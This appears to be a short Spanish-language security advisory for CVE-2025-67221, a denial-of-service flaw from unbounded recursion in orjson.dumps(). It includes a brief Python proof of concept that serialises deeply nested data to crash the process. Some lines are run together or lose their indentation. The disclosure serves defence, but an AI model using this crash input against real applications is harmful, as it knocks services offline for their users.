
Una vulnerabilidad en orjson
| Campo | Valor |
|---|---|
| ID de CVE | CVE-2025-67221 |
| Producto Afectado | orjson |
| Versiones Afectadas | ≤ 3.11.4 |
| Tipo de Vulnerabilidad | Denegación de Servicio (Recursión No Controlada) |
| Vector de Ataque | Remoto (si el atacante controla los datos serializados) |
Existe una vulnerabilidad de denegación de servicio en la función orjson.dumps() en versiones de orjson 3.11.4 y anteriores. La función no impone un límite de recursión al serializar estructuras de datos JSON profundamente anidadas. Un atacante que pueda hacer que una aplicación serialice datos anidados controlados por el atacante puede provocar un bloqueo en la rutina de serialización.
orjson.dumps()pysrc/orjson/__init__.pyiProbado en
Las aplicaciones que usan orjson para serializar estructuras de datos no confiables o controladas por un atacante pueden ser vulnerables a ataques de denegación de servicio.
Código para replicar la vulnerabilidad localmente:
import orjson
import sys
import platform
print(f'OS: {platform.platform()}')
print(f'Python version: {sys. version}')
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)
##Demostración
El código anterior provoca un bonito core dump
